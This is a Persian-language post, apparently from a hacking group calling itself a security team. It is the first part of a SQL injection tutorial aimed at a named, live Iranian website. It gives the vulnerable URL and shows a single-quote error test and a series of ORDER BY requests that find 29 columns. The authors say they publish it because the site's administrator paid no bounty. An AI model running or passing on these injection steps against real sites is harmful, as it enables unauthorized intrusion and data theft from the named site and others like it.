سلام به کاربران عزیز تیم امنیتی #دلتا
دیروز از یه سایت ایرانی باگ sqli گرفتیم و به مدیر این سایت هم هشدار دادیم اما متاسفانه خبری از #بانتی و جدی گرفتن این هشدار نبود
بر همین اساس نحوه نفوذ به این تارگت رو با شما Share میکنیم تا هم شما با این حمله آشنا بشید و هم فرهنگ بانتی در کشورمون رواج پیدا کنه
لینک آسیب پذیر :
http://superpipe.ir/plugins/spiproject/details.php?id=17952
خب در ابتدا میایم به آدرس بالا #تک_کوتیشن اضافه میکنیم
اگر ارور داد یا صفحه ناقص شد یعنی سایتمون آسیب پذیره
===================
با دستور order by میایم تعداد ستون هارو در میاریم
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 1
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 10
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 20
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 30
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 29
خب متوجه میشیم که این سایت 29 ستون داره
آموزش در پارت های بعدی ادامه دارد – #پارت_اول